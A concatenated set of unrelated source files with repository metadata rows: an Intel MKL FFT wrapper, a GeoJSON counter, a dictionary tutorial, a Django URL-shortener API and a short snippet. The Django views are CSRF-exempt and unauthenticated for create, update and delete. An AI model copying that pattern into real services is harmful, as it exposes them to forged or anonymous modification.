mkl.DftiSetValue(Desc_Handle, DFTI_FORWARD_SCALE, scale)
mkl.DftiSetValue(Desc_Handle, DFTI_BACKWARD_SCALE, scale)
elif norm is None:
if a.dtype == np.complex64:
scale = _ctypes.c_float(1. / a.shape[axis])
else:
scale = _ctypes.c_double(1. / a.shape[axis])
mkl.DftiSetValue(Desc_Handle, DFTI_BACKWARD_SCALE, scale)
# set all values if necessary
if a.ndim != 1:
mkl.DftiSetValue(Desc_Handle, DFTI_NUMBER_OF_TRANSFORMS, n_transforms)
mkl.DftiSetValue(Desc_Handle, DFTI_INPUT_DISTANCE, distance)
mkl.DftiSetValue(Desc_Handle, DFTI_OUTPUT_DISTANCE, distance)
mkl.DftiSetValue(Desc_Handle, DFTI_INPUT_STRIDES, _ctypes.byref(strides))
mkl.DftiSetValue(Desc_Handle, DFTI_OUTPUT_STRIDES, _ctypes.byref(strides))
if scrambled:
s = mkl.DftiSetValue(Desc_Handle, DFTI_ORDERING, DFTI_BACKWARD_SCRAMBLED)
DftiErrorMessage(s)
if direction == 'forward':
fft_func = mkl.DftiComputeForward
elif direction == 'backward':
fft_func = mkl.DftiComputeBackward
else:
assert False
if inplace:
# In-place FFT
mkl.DftiCommitDescriptor(Desc_Handle)
fft_func(Desc_Handle, a.ctypes.data_as(_ctypes.c_void_p) )
else:
# Not-in-place FFT
mkl.DftiSetValue(Desc_Handle, DFTI_PLACEMENT, DFTI_NOT_INPLACE)
mkl.DftiCommitDescriptor(Desc_Handle)
fft_func(Desc_Handle, a.ctypes.data_as(_ctypes.c_void_p), out.ctypes.data_as(_ctypes.c_void_p) )
mkl.DftiFreeDescriptor(_ctypes.byref(Desc_Handle))
return out
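# Illustrative usage sketch (editor's addition, not part of the original module):
# mkl_fft transforms one axis of a 1D or 2D array; here each column of a 2D
# complex array is transformed and then inverted. The _example_* name is
# purely illustrative.
def _example_mkl_fft_columns():
    a = np.random.rand(8, 16) + 1j * np.random.rand(8, 16)
    A = mkl_fft(a, axis=0, direction='forward')    # unscaled FFT of every column
    b = mkl_fft(A, axis=0, direction='backward')   # inverse applies the 1/n factor
    assert np.allclose(a, b)
    return A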
def proper_fft2(a, norm=None, direction='forward', mkl_dir=None, fft_nthreads=0):
r"""Forward/backward 2D single- or double-precision FFT.
Uses the Intel MKL libraries distributed with Enthought Python.
Normalisation is different from Numpy!
By default, allocates new memory like 'a' for output data.
Returns the array containing output data.
See Also
--------
fft2, ifft2
"""
    # Input must be complex; unsupported dtypes raise ValueError rather than being cast.
if a.dtype != np.complex128 and a.dtype != np.complex64:
raise ValueError('prop_fftw: Unsupported data type. Must be complex64 or complex128.')
# Create the description handle
Desc_Handle = _ctypes.c_void_p(0)
dims = (_ctypes.c_int64*2)(*a.shape)
if a.dtype == np.complex64:
mkl.DftiCreateDescriptor(_ctypes.byref(Desc_Handle), DFTI_SINGLE, DFTI_COMPLEX, _ctypes.c_int(2), dims)
elif a.dtype == np.complex128:
mkl.DftiCreateDescriptor(_ctypes.byref(Desc_Handle), DFTI_DOUBLE, DFTI_COMPLEX, _ctypes.c_int(2), dims)
# Set normalization factor
if norm == 'ortho':
if a.dtype == np.complex64:
scale = _ctypes.c_float(1.0 / np.sqrt(np.prod(a.shape)))
else:
scale = _ctypes.c_double(1.0 / np.sqrt(np.prod(a.shape)))
mkl.DftiSetValue(Desc_Handle, DFTI_FORWARD_SCALE, scale)
mkl.DftiSetValue(Desc_Handle, DFTI_BACKWARD_SCALE, scale)
elif norm is None:
if a.dtype == np.complex64:
scale = _ctypes.c_float(1.0 / np.prod(a.shape))
else:
scale = _ctypes.c_double(1.0 / np.prod(a.shape))
mkl.DftiSetValue(Desc_Handle, DFTI_BACKWARD_SCALE, scale)
# Set input strides if necessary
if not a.flags['C_CONTIGUOUS']:
in_strides = (_ctypes.c_int*3)(0, a.strides[0] // a.itemsize, a.strides[1] // a.itemsize)
mkl.DftiSetValue(Desc_Handle, DFTI_INPUT_STRIDES, _ctypes.byref(in_strides))
if direction == 'forward':
fft_func = mkl.DftiComputeForward
elif direction == 'backward':
fft_func = mkl.DftiComputeBackward
else:
assert False
mkl.DftiSetValue( Desc_Handle, DFTI_THREAD_LIMIT, _ctypes.c_int(fft_nthreads) )
# In-place FFT
mkl.DftiCommitDescriptor( Desc_Handle )
fft_func( Desc_Handle, a.ctypes.data_as(_ctypes.c_void_p) )
mkl.DftiFreeDescriptor( _ctypes.byref(Desc_Handle) )
return
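# Illustrative usage sketch (editor's addition, not part of the original module):
# proper_fft2 works strictly in place on a complex array and returns None, so the
# caller keeps using the same array object. The _example_* name is purely
# illustrative.
def _example_proper_fft2_inplace():
    a = np.random.rand(32, 32) + 1j * np.random.rand(32, 32)
    proper_fft2(a, direction='forward')    # `a` now holds its own (unscaled) 2D DFT
    proper_fft2(a, direction='backward')   # backward pass rescales by 1/a.size
    return a                               # approximately the original data again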
def mkl_fft2(a, norm=None, direction='forward', out=None):
r"""Forward/backward 2D single- or double-precision FFT.
Uses the Intel MKL libraries distributed with Enthought Python.
Normalisation is different from Numpy!
By default, allocates new memory like 'a' for output data.
Returns the array containing output data.
See Also
--------
fft2, ifft2
"""
# convert input to complex data type if real (also memory copy)
if a.dtype != np.complex128 and a.dtype != np.complex64:
if a.dtype == np.int64 or a.dtype == np.uint64 or a.dtype == np.float64:
a = np.array(a, dtype=np.complex128)
else:
a = np.array(a, dtype=np.complex64)
# Configure in-place vs out-of-place
inplace = False
if out is a:
inplace = True
elif out is not None:
assert out.dtype == a.dtype
assert a.shape == out.shape
assert not np.may_share_memory(a, out)
else:
out = np.empty_like(a)
# Create the description handle
Desc_Handle = _ctypes.c_void_p(0)
dims = (_ctypes.c_long*2)(*a.shape)
if a.dtype == np.complex64:
mkl.DftiCreateDescriptor(_ctypes.byref(Desc_Handle), DFTI_SINGLE, DFTI_COMPLEX, _ctypes.c_int(2), dims)
elif a.dtype == np.complex128:
mkl.DftiCreateDescriptor(_ctypes.byref(Desc_Handle), DFTI_DOUBLE, DFTI_COMPLEX, _ctypes.c_int(2), dims)
# Set normalization factor
if norm == 'ortho':
scale = _ctypes.c_double(1.0 / np.sqrt(np.prod(a.shape)))
mkl.DftiSetValue(Desc_Handle, DFTI_FORWARD_SCALE, scale)
mkl.DftiSetValue(Desc_Handle, DFTI_BACKWARD_SCALE, scale)
elif norm is None:
scale = _ctypes.c_double(1.0 / np.prod(a.shape))
mkl.DftiSetValue(Desc_Handle, DFTI_FORWARD_SCALE, _ctypes.c_double(1.0))
mkl.DftiSetValue(Desc_Handle, DFTI_BACKWARD_SCALE, scale)
# Set input strides if necessary
if not a.flags['C_CONTIGUOUS']:
in_strides = (_ctypes.c_long*3)(0, a.strides[0] // a.itemsize, a.strides[1] // a.itemsize)
mkl.DftiSetValue(Desc_Handle, DFTI_INPUT_STRIDES, _ctypes.byref(in_strides))
if direction == 'forward':
fft_func = mkl.DftiComputeForward
elif direction == 'backward':
fft_func = mkl.DftiComputeBackward
else:
assert False
if inplace:
# In-place FFT
mkl.DftiCommitDescriptor(Desc_Handle)
fft_func(Desc_Handle, a.ctypes.data_as(_ctypes.c_void_p) )
else:
# Not-in-place FFT
mkl.DftiSetValue(Desc_Handle, DFTI_PLACEMENT, DFTI_NOT_INPLACE)
# Set output strides if necessary
if not out.flags['C_CONTIGUOUS']:
out_strides = (_ctypes.c_long*3)(0, out.strides[0] // out.itemsize, out.strides[1] // out.itemsize)
mkl.DftiSetValue(Desc_Handle, DFTI_OUTPUT_STRIDES, _ctypes.byref(out_strides))
mkl.DftiCommitDescriptor(Desc_Handle)
fft_func(Desc_Handle, a.ctypes.data_as(_ctypes.c_void_p), out.ctypes.data_as(_ctypes.c_void_p) )
mkl.DftiFreeDescriptor(_ctypes.byref(Desc_Handle))
return out
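# Illustrative usage sketch (editor's addition, not part of the original module):
# mkl_fft2 allocates a new output array by default; passing out=a (or any
# preallocated array of the same shape and dtype) avoids the allocation. The
# _example_* name is purely illustrative.
def _example_mkl_fft2():
    a = np.random.rand(32, 32).astype(np.complex128)
    A = mkl_fft2(a, direction='forward')          # out-of-place: `a` is left untouched
    mkl_fft2(A, direction='backward', out=A)      # in-place inverse transform
    assert np.allclose(A, a)
    return A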
def cce2full(A):
# Assume all square for now
N = A.shape
N_half = N[0]//2 + 1
out = np.empty((A.shape[0], A.shape[0]), dtype=A.dtype)
out[:, :N_half] = A
out[1:, N_half:] = np.rot90(A[1:, 1:-1], 2).conj()
# Complete the first row
out[0, N_half:] = A[0, -2:0:-1].conj()
return out
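# Illustrative usage sketch (editor's addition, not part of the original module):
# cce2full expands a square conjugate-even (CCE) half-spectrum into the full
# spectrum via Hermitian symmetry; numpy's reference transforms are used here
# only to demonstrate the layout. The _example_* name is purely illustrative.
def _example_cce2full():
    x = np.random.rand(16, 16)              # real, square, even-sized input
    half = np.fft.rfft2(x)                  # CCE half-spectrum, shape (16, 9)
    full = cce2full(half)                   # reconstructed full spectrum, shape (16, 16)
    assert np.allclose(full, np.fft.fft2(x))
    return full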
def mkl_rfft2(a, norm=None, direction='forward', out=None):
r"""Forward/backward single- or double-precision real-complex 2D FFT.
    The complex output is stored in the conjugate-even (CCE) layout: only the
    first a.shape[1] // 2 + 1 columns of the full spectrum are returned.
See Also
--------
rfft2, irfft2
"""
assert (a.dtype == np.float32) or (a.dtype == np.float64)
out_type = np.complex128
if a.dtype == np.float32:
out_type = np.complex64
n = a.shape[1]
# Allocate memory if needed
if out is not None:
assert out.dtype == out_type
assert out.shape[1] == n // 2 + 1
assert not np.may_share_memory(a, out)
else:
size = list(a.shape)
size[1] = n // 2 + 1
out = np.empty(size, dtype=out_type)
# Create the description handle
Desc_Handle = _ctypes.c_void_p(0)
dims = (_ctypes.c_long*2)(*a.shape)
if a.dtype == np.float32:
mkl.DftiCreateDescriptor(_ctypes.byref(Desc_Handle), DFTI_SINGLE, DFTI_REAL, _ctypes.c_int(2), dims)
elif a.dtype == np.float64:
mkl.DftiCreateDescriptor(_ctypes.byref(Desc_Handle), DFTI_DOUBLE, DFTI_REAL, _ctypes.c_int(2), dims)
# Set the storage type
mkl.DftiSetValue(Desc_Handle, DFTI_CONJUGATE_EVEN_STORAGE, DFTI_COMPLEX_COMPLEX)
# Set normalization factor
if norm == 'ortho':
if a.dtype == np.float32:
scale = _ctypes.c_float(1.0 / np.sqrt(np.prod(a.shape)))
else:
scale = _ctypes.c_double(1.0 / np.sqrt(np.prod(a.shape)))
mkl.DftiSetValue(Desc_Handle, DFTI_FORWARD_SCALE, scale)
mkl.DftiSetValue(Desc_Handle, DFTI_BACKWARD_SCALE, scale)
elif norm is None:
        if a.dtype == np.float32:
            scale = _ctypes.c_float(1.0 / np.prod(a.shape))
        else:
            scale = _ctypes.c_double(1.0 / np.prod(a.shape))
mkl.DftiSetValue(Desc_Handle, DFTI_BACKWARD_SCALE, scale)
# For strides, the C type used *must* be long
in_strides = (_ctypes.c_long*3)(0, a.strides[0] // a.itemsize, a.strides[1] // a.itemsize)
out_strides = (_ctypes.c_long*3)(0, out.strides[0] // out.itemsize, out.strides[1] // out.itemsize)
# mkl.DftiSetValue(Desc_Handle, DFTI_INPUT_STRIDES, _ctypes.byref(in_strides))
mkl.DftiSetValue(Desc_Handle, DFTI_OUTPUT_STRIDES, _ctypes.byref(out_strides))
if direction == 'forward':
fft_func = mkl.DftiComputeForward
elif direction == 'backward':
fft_func = mkl.DftiComputeBackward
else:
assert False
# Not-in-place FFT
mkl.DftiSetValue(Desc_Handle, DFTI_PLACEMENT, DFTI_NOT_INPLACE)
# Set output strides if necessary
if not out.flags['C_CONTIGUOUS']:
out_strides = (_ctypes.c_int*3)(0, out.strides[0] // out.itemsize, out.strides[1] // out.itemsize)
mkl.DftiSetValue(Desc_Handle, DFTI_OUTPUT_STRIDES, _ctypes.byref(out_strides))
mkl.DftiCommitDescriptor(Desc_Handle)
fft_func(Desc_Handle, a.ctypes.data_as(_ctypes.c_void_p), out.ctypes.data_as(_ctypes.c_void_p) )
mkl.DftiFreeDescriptor(_ctypes.byref(Desc_Handle))
return out
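# Illustrative usage sketch (editor's addition, not part of the original module):
# mkl_rfft2 returns only the conjugate-even half of the 2D spectrum; for square
# inputs cce2full (above) can rebuild the full spectrum. The _example_* name is
# purely illustrative.
def _example_mkl_rfft2():
    x = np.random.rand(32, 32)
    half = mkl_rfft2(x, direction='forward')   # shape (32, 17), unscaled forward pass
    return cce2full(half)                      # full (32, 32) spectrum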
def rfft(a, n=None, axis=-1, norm=None, out=None, scrambled=False):
r"""Computes the forward real-complex FFT using Intel's MKL routines.
Faster than mkl_fft.fft for real arrays.
Parameters
----------
a : ndarray
Input array to transform. It must be real.
n : int
Size of the transform.
axis : int
        Axis along which the transform is computed (default is -1, i.e. the
        last axis).
norm : {None, 'ortho'}
Normalization of the transform. None (default) is same as numpy;
'ortho' gives an orthogonal (norm-preserving) transform.
out : ndarray
Points to the output array. Used when the array is preallocated or an
in-place transform is desired. Default is None, meaning that the
memory is allocated for the output array of the same shape as a.
scrambled: bool, optional (default False)
Allows the output of the FFT to be out of order if set to true. This
can sometimes lead to better performance.
Returns
-------
The transformed output array.
"""
return mkl_rfft(a, n=n, axis=axis, norm=norm, direction='forward', out=out, scrambled=scrambled)
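# Illustrative usage sketch (editor's addition, not part of the original module):
# rfft mirrors numpy.fft.rfft for real input with the default (unscaled forward)
# normalization. The _example_* name is purely illustrative.
def _example_rfft():
    x = np.random.rand(100)
    X = rfft(x)                                # length 100 // 2 + 1 == 51
    assert np.allclose(X, np.fft.rfft(x))
    return X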
def irfft(a, n=None, axis=-1, norm=None, out=None, scrambled=False):
r"""Computes the inverse complex-real FFT using Intel's MKL routines.
Faster than mkl_fft.ifft for conjugate-even arrays.
Parameters
----------
a : ndarray
Input array to transform. It should be stored in the conjugate-even
format (i.e. like output of rfft).
n : int
Size of the transform.
axis : int
        Axis along which the transform is computed (default is -1, i.e. the
        last axis).
norm : {None, 'ortho'}
Normalization of the transform. None (default) is same as numpy;
'ortho' gives an orthogonal (norm-preserving) transform.
out : ndarray
Points to the output array. Used when the array is preallocated or an
in-place transform is desired. Default is None, meaning that the
memory is allocated for the output array of the same shape as a.
scrambled: bool, optional (default False)
Allows the input of the iFFT to be out of order if set to true. This
can sometimes lead to better performance.
Returns
-------
The transformed output array.
"""
return mkl_rfft(a, n=n, axis=axis, norm=norm, direction='backward', out=out, scrambled=scrambled)
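# Illustrative usage sketch (editor's addition, not part of the original module):
# irfft undoes rfft when given the conjugate-even half-spectrum and the original
# transform length n. The _example_* name is purely illustrative.
def _example_irfft_roundtrip():
    x = np.random.rand(100)
    X = rfft(x)
    y = irfft(X, n=100)     # with norm=None the inverse applies the 1/n factor
    assert np.allclose(x, y)
    return y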
def fft(a, n=None, axis=-1, norm=None, out=None, scrambled=False):
r"""Computes the forward FFT using Intel's MKL routines.
Parameters
----------
a : ndarray
Input array to transform.
n : int
Size of the transform.
axis : int
        Axis along which the transform is computed (default is -1, i.e. the
        last axis).
norm : {None, 'ortho'}
Normalization of the transform. None (default) is same as numpy;
'ortho' gives an orthogonal (norm-preserving) transform.
out : ndarray
Points to the output array. Used when the array is preallocated or an
in-place transform is desired. Default is None, meaning that the
memory is allocated for the output array of the same shape as a.
scrambled: bool, optional (default False)
Allows the output of the FFT to be out of order if set to true. This
can sometimes lead to better performance.
Returns
-------
The transformed output array.
"""
return mkl_fft(a, n=n, axis=axis, norm=norm, direction='forward', out=out, scrambled=scrambled)
def ifft(a, n=None, axis=-1, norm=None, out=None, scrambled=False):
r"""Computes the inverse FFT using Intel's MKL routines.
Parameters
----------
a : ndarray
Input array to transform.
n : int
Size of the transform.
axis : int
Axis along which the transform is computed (default is -1, summation
over the last axis).
norm : {None, 'ortho'}
Normalization of the transform. None (default) is same as numpy;
'ortho' gives an orthogonal (norm-preserving) transform.
out : ndarray
Points to the output array. Used when the array is preallocated or an
in-place transform is desired. Default is None, meaning that the
memory is allocated for the output array of the same shape as a.
scrambled: bool, optional (default False)
Allows the input of the iFFT to be out of order if set to true. This
can sometimes lead to better performance.
Returns
-------
The transformed output array.
"""
return mkl_fft(a, n=n, axis=axis, norm=norm, direction='backward', out=out, scrambled=scrambled)
def fft2(a, norm=None, out=None):
r"""Computes the forward 2D FFT using Intel's MKL routines.
Parameters
----------
a : ndarray
Input array to transform.
norm : {None, 'ortho'}
Normalization of the transform. None (default) is same as numpy;
'ortho' gives an orthogonal (norm-preserving) transform.
out : ndarray
Points to the output array. Used when the array is preallocated or an
in-place transform is desired. Default is None, meaning that the
memory is allocated for the output array of the same shape as a.
Returns
-------
The transformed output array.
"""
proper_fft2(a, norm=norm, direction='forward')
return fftshift(a)
#return mkl_fft2(a, norm=norm, direction='forward', out=out)
def ifft2(a, norm=None, out=None):
r"""Computes the inverse 2D FFT using Intel's MKL routines.
Parameters
----------
a : ndarray
Input array to transform.
norm : {None, 'ortho'}
Normalization of the transform. None (default) is same as numpy;
'ortho' gives an orthogonal (norm-preserving) transform.
out : ndarray
Points to the output array. Used when the array is preallocated or an
in-place transform is desired. Default is None, meaning that the
memory is allocated for the output array of the same shape as a.
Returns
-------
The transformed output array.
"""
proper_fft2(a, norm=norm, direction='backward')
return fftshift(a)
#return mkl_fft2(a, norm=norm, direction='backward', out=out)
def rfft2(a, norm=None, out=None):
r"""Computes the forward real -> complex conjugate-even 2D FFT using
Intel's MKL routines.
Faster than mkl_fft.fft2 for real arrays.
Parameters
----------
a : ndarray
Input array to transform. It must be real.
norm : {None, 'ortho'}
Normalization of the transform. None (default) is same as numpy;
'ortho' gives an orthogonal (norm-preserving) transform.
out : ndarray
Points to the output array. Used when the array is preallocated or an
in-place transform is desired. Default is None, meaning that the
memory is allocated for the output array of the same shape as a.
Returns
-------
The transformed output array.
"""
return mkl_rfft2(a, norm=None, direction='forward', out=None)
def irfft2(a, norm=None, out=None):
r"""Computes the forward conjugate-even -> real 2D FFT using Intel's MKL
routines.
Faster than mkl_fft.ifft2 for conjugate-even arrays.
Parameters
----------
a : ndarray
Input array to transform. It should be stored in the conjugate-even
format (i.e. like output of rfft2).
norm : {None, 'ortho'}
Normalization of the transform. None (default) is same as numpy;
'ortho' gives an orthogonal (norm-preserving) transform.
out : ndarray
Points to the output array. Used when the array is preallocated or an
in-place transform is desired. Default is None, meaning that the
memory is allocated for the output array of the same shape as a.
Returns
-------
The transformed output array.
"""
return mkl_rfft2(a, norm=None, direction='backward', out=None)
def fftshift(x, additional_shift=None, axes=None):
"""
Shift the zero-frequency component to the center of the spectrum, or with
some additional offset from the center.
This is a more generic fork of `~numpy.fft.fftshift`, which doesn't support
additional shifts.
Parameters
----------
x : array_like
Input array.
additional_shift : list of length ``M``
Desired additional shifts in ``x`` and ``y`` directions respectively
axes : int or shape tuple, optional
Axes over which to shift. Default is None, which shifts all axes.
Returns
-------
y : `~numpy.ndarray`
The shifted array.
"""
tmp = np.asarray(x)
ndim = len(tmp.shape)
if axes is None:
axes = list(range(ndim))
elif isinstance(axes, integer_types):
axes = (axes,)
# If no additional shift is supplied, reproduce `numpy.fft.fftshift` result
if additional_shift is None:
additional_shift = [0, 0]
y = tmp
for k, extra_shift in zip(axes, additional_shift):
n = tmp.shape[k]
if (n+1)//2 - extra_shift < n:
p2 = (n+1)//2 - extra_shift
else:
p2 = abs(extra_shift) - (n+1)//2
mylist = np.concatenate((np.arange(p2, n), np.arange(0, p2)))
y = np.take(y, mylist, k)
return y
if __name__ == "__main__":
import time
n_iter = 200
N = 256
np.seterr(all='raise')
algos = {
'Numpy fft2 complex128': {'transform': np.fft.fft2, 'dtype': np.complex128},
'MKL fft2 complex128': {'transform': fft2, 'dtype': np.complex128},
'Numpy fft2 complex64': {'transform': np.fft.fft2, 'dtype': np.complex64},
'MKL fft2 complex64': {'transform': fft2, 'dtype': np.complex64},
'Numpy fft complex128': {'transform': np.fft.fft, 'dtype': np.complex128},
'MKL fft complex128': {'transform': fft, 'dtype': np.complex128},
'Numpy fft complex64': {'transform': np.fft.fft, 'dtype': np.complex64},
'MKL fft complex64': {'transform': fft, 'dtype': np.complex64},
'Numpy rfft float64': {'transform': np.fft.rfft, 'dtype': np.float64},
'MKL rfft float64': {'transform': rfft, 'dtype': np.float64},
'Numpy rfft float32': {'transform': np.fft.rfft, 'dtype': np.float32},
'MKL rfft float32': {'transform': rfft, 'dtype': np.float32},
}
for algo in algos.keys():
A = algos[algo]['dtype'](np.random.randn(N, N))
#C = np.zeros((N, N), dtype='complex128')
start_time = time.time()
for i in range(n_iter):
algos[algo]['transform'](A)
total = time.time() - start_time
print(algo,":")
print("--- %s seconds ---" % total)
| UTF-8 | Python | false | false | 30,947 | py | 82 | mkl_fft.py | 74 | 0.620836 | 0.607943 | 0 | 891 | 33.73064 | 115 |
AntKazakovv/GeoJsonAnalyzer | 12,189,117,210,718 | 8598f43192d604ea459dfb5dc7b0c14704c7bcb1 | 636419f778f1551e8a3744be0192a88037093352 | /src/geo_tools.py | e80e4cdb218e4f50bd5e326d67ddb37203c2ec39 | []
| no_license | https://github.com/AntKazakovv/GeoJsonAnalyzer | 6c2537214bdc6229dbea5a93017115999c613418 | 9d7fdbca5202d0f52e993c67791c5d554aab4977 | refs/heads/master | 2023-03-24T17:37:20.081178 | 2020-06-03T09:24:09 | 2020-06-03T09:24:09 | 269,043,003 | 0 | 0 | null | false | 2021-03-20T04:11:16 | 2020-06-03T09:16:25 | 2020-06-03T09:24:20 | 2021-03-20T04:11:15 | 2 | 0 | 0 | 1 | Python | false | false | # def checkCoordsPoint(list):
import geojson
dump = """{
"type": "FeatureCollection",
"crs": {
"type": "name",
"properties": {
"name": "EPSG:3857"
}
},
"features": [{
"type": "Feature",
"geometry": {
"type": "Point",
"coordinates": [0, 0]
}
}, {
"type": "Feature",
"geometry": {
"type": "LineString",
"coordinates": [[4e6, -2e6], [8e6, 2e6]]
}
}, {
"type": "Feature",
"geometry": {
"type": "LineString",
"coordinates": [[4e6, 2e6], [8e6, -2e6]]
}
}, {
"type": "Feature",
"geometry": {
"type": "Polygon",
"coordinates": [[[-5e6, -1e6], [-4e6, 1e6], [-3e6, -1e6]]]
}
}, {
"type": "Feature",
"geometry": {
"type": "MultiLineString",
"coordinates": [
[[-1e6, -7.5e5], [-1e6, 7.5e5]],
[[1e6, -7.5e5], [1e6, 7.5e5]],
[[-7.5e5, -1e6], [7.5e5, -1e6]],
[[-7.5e5, 1e6], [7.5e5, 1e6]]
]
}
}, {
"type": "Feature",
"geometry": {
"type": "MultiPolygon",
"coordinates": [
[[[-5e6, 6e6], [-5e6, 8e6], [-3e6, 8e6], [-3e6, 6e6]]],
[[[-2e6, 6e6], [-2e6, 8e6], [0, 8e6], [0, 6e6]]],
[[[1e6, 6e6], [1e6, 8e6], [3e6, 8e6], [3e6, 6e6]]]
]
}
}, {
"type": "Feature",
"geometry": {
"type": "GeometryCollection",
"geometries": [{
"type": "LineString",
"coordinates": [[-5e6, -5e6], [0, -5e6]]
}, {
"type": "Point",
"coordinates": [4e6, -5e6]
}, {
"type": "Polygon",
"coordinates": [[[1e6, -6e6], [2e6, -4e6], [3e6, -6e6]]]
}]
}
}]
}"""
def toGeoJson(obj):
try:
return geojson.loads(obj)
except TypeError as e:
return {"error": "не удалось загрузить geoJson, документ не валиден"}
def getNumberObjects(geoJson):
if geoJson.get("error") and geoJson["error"]:
return geoJson
features = geoJson.features
finalStruct = {}
for item in features:
if finalStruct.get(item.geometry.type):
finalStruct[item.geometry.type] += 1
else:
finalStruct[item.geometry.type] = 1
try:
item.geometry.geometries
for i in item.geometry.geometries:
if finalStruct.get(i.type):
finalStruct[i.type] += 1
else:
finalStruct[i.type] = 1
except:
pass
return finalStruct
if __name__ == "__main__":
f = toGeoJson(dump)
print(getNumberObjects(f)) | UTF-8 | Python | false | false | 2,604 | py | 3 | geo_tools.py | 2 | 0.464772 | 0.407552 | 0 | 106 | 23.245283 | 77 |
folkol/tutorials | 13,048,110,691,827 | e0bc41ce8635bfbfe483d9b8abfd771b5c81901b | 81ec35443bc2567118aece66254c021e73f960d1 | /python3/5.5.dictionaries.py | ed9c74be7c6566ccce9fafab234d7bea865f1114 | []
| no_license | https://github.com/folkol/tutorials | 95f1d641843cc26c04a79f74270721c7de4ac628 | 962b0fd89dac244e7f9dcb03773a25d96413fb0b | refs/heads/master | 2023-08-17T18:50:18.358911 | 2023-08-02T20:46:53 | 2023-08-02T20:47:35 | 66,833,956 | 0 | 0 | null | false | 2023-09-05T03:40:46 | 2016-08-29T10:26:01 | 2021-11-24T09:15:13 | 2023-09-05T03:40:45 | 9,057 | 0 | 0 | 57 | JavaScript | false | false | empty_dict = {}
d = {'foo': 1, 'bar': 'baz', 'quz': []}
print(d)
print('foo' in d) # is key in dict. Sugar for b.__contains__(a)
del d['foo'] # Remove key from dict
print('foo' in d) # is key in dict
d['foo'] = 1
print(d['foo'])
d['foo'] = 2
print(d['foo'])
print(list(d.keys()))
# print(d['asdf']) # KeyError
# d[('my', ['list'])] = 'foo' # List is not hashable, so this tuple is not hashable...
d['asdf'] = 'wut'
print(d)
for k, v in d.items():
print(k, v)
print('for k in d.keys()')
for k in d.keys():
print(k)
print('for k in d') # loop over keys
for k in d:
print(k)
print('for v in d.values()')
for v in d.values():
print(v)
print(dict([(1, 2), ('a', 'b')])) # dict from list of pairs
print({x: x ** x for x in range(10)}) # dict comprehension
print(dict(key1=1234, key2=122, key3='foo')) # dict from kwargs
from collections import defaultdict
def recursive_defaultdict():
return defaultdict(recursive_defaultdict)
dd = recursive_defaultdict()
dd['foo']['bar']['baz'] = 'qux'
print(dd)
print(dd['foo']['bar']['baz'])
print(dd.items())
| UTF-8 | Python | false | false | 1,087 | py | 188 | 5.5.dictionaries.py | 115 | 0.593376 | 0.577737 | 0 | 54 | 19.12963 | 87 |
Faiznurullah/HacktoberFest-Python | 2,044,404,454,916 | 542250becb021947a302004cea48bbc457d08618 | a7b4e777e5e08194112594b6d4cde029c181f5a3 | /codes/django-url-shortener-rest-api/api/views.py | 651162451958997531ed639e7cf762d7f022bd73 | []
| no_license | https://github.com/Faiznurullah/HacktoberFest-Python | b1407248d95e178a131c7f350ecccf7ae8aa7e5a | b3615869f98696de784dcc5335d9e070e05bfb00 | refs/heads/main | 2023-08-26T14:14:32.576035 | 2021-10-01T14:41:45 | 2021-10-01T14:41:45 | 412,502,808 | 1 | 1 | null | true | 2021-10-10T01:25:37 | 2021-10-01T14:38:11 | 2021-10-01T14:41:53 | 2021-10-01T14:41:45 | 222,376 | 0 | 1 | 1 | Jupyter Notebook | false | false | from django.http.response import Http404, HttpResponseRedirect
from django.http import HttpResponse, JsonResponse
from django.views.decorators.csrf import csrf_exempt
from rest_framework.parsers import JSONParser
from .models import ShortenedURL
from .serializers import ShortenedURLSerializer
def home(request):
"""Get Status of the API"""
response_status = {'text': "API is up"}
return JsonResponse(response_status, status=200)
@csrf_exempt
def shortenedURL_list(request):
"""List all shortenedURLs, or create a new shortenedURL."""
if request.method == 'GET':
shortenedURLs = ShortenedURL.objects.all()
serializer = ShortenedURLSerializer(shortenedURLs, many=True)
return JsonResponse(serializer.data, safe=False)
if request.method == 'POST':
data = JSONParser().parse(request)
serializer = ShortenedURLSerializer(data=data)
if serializer.is_valid():
serializer.save()
return JsonResponse(serializer.data, status=201)
return JsonResponse(serializer.errors, status=400)
return HttpResponse(status=400)
@csrf_exempt
def shortenedURL_detail(request, short_url):
"""Retrieve, update or delete a code shortenedURL."""
try:
shortenedURL = ShortenedURL.objects.get(short_url=short_url)
if request.method == 'GET':
serializer = ShortenedURLSerializer(shortenedURL)
return JsonResponse(serializer.data)
if request.method == 'PUT':
data = JSONParser().parse(request)
serializer = ShortenedURLSerializer(shortenedURL, data=data)
if serializer.is_valid():
serializer.save()
return JsonResponse(serializer.data)
return JsonResponse(serializer.errors, status=400)
if request.method == 'DELETE':
shortenedURL.delete()
return HttpResponse(status=204)
except ShortenedURL.DoesNotExist:
return HttpResponse(status=404)
def redirect_view(request, short_url):
"""Redirect the short URL to link URL"""
try:
if request.method == 'GET':
shortener = ShortenedURL.objects.get(short_url=short_url)
shortener.times_visited += 1
shortener.save()
return HttpResponseRedirect(shortener.long_url)
except ShortenedURL.DoesNotExist:
return HttpResponse(status=404)
| UTF-8 | Python | false | false | 2,410 | py | 50 | views.py | 22 | 0.675104 | 0.663485 | 0 | 66 | 35.515152 | 72 |
JKK5/BOJ | 2,568,390,460,288 | 1e22c6afb4494747972cb31a371fece51e5f7b42 | 0291d961a1406802e4ff52a5dd742f08b9030583 | /lv5/2.py | 930c949318e72fea5c37ca1478690b3a16113d35 | []
| no_license | https://github.com/JKK5/BOJ | d607a2a8d4adc498345fb62ef1cd10c39c4c5c2f | 0ef1d302c14cd4514647ea23dd8b650af6bca6c8 | refs/heads/main | 2023-02-16T07:09:42.586297 | 2021-01-17T13:17:46 | 2021-01-17T13:17:46 | 328,104,093 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | # lst = []
# for i in range(9):
# lst.append(int(input()))
# print(max(lst), lst.index(max(lst)) + 1)
lst = [int(input()) for i in range(9)]
print(max(lst), lst.index(max(lst)) + 1)
| UTF-8 | Python | false | false | 189 | py | 26 | 2.py | 26 | 0.566138 | 0.544974 | 0 | 9 | 20 | 42 |
Est17256/LAB2-Redes-Deteccion-Errores | 13,056,700,621,192 | 88fb264a29eeeab89e3fe6565ed3a360b7aea574 | 60a26ca7fb99965fc572146d4e60d2134f71d5f6 | /emisor.py | f9d0b3a6e70683901a1c3267d4d4450289244054 | []
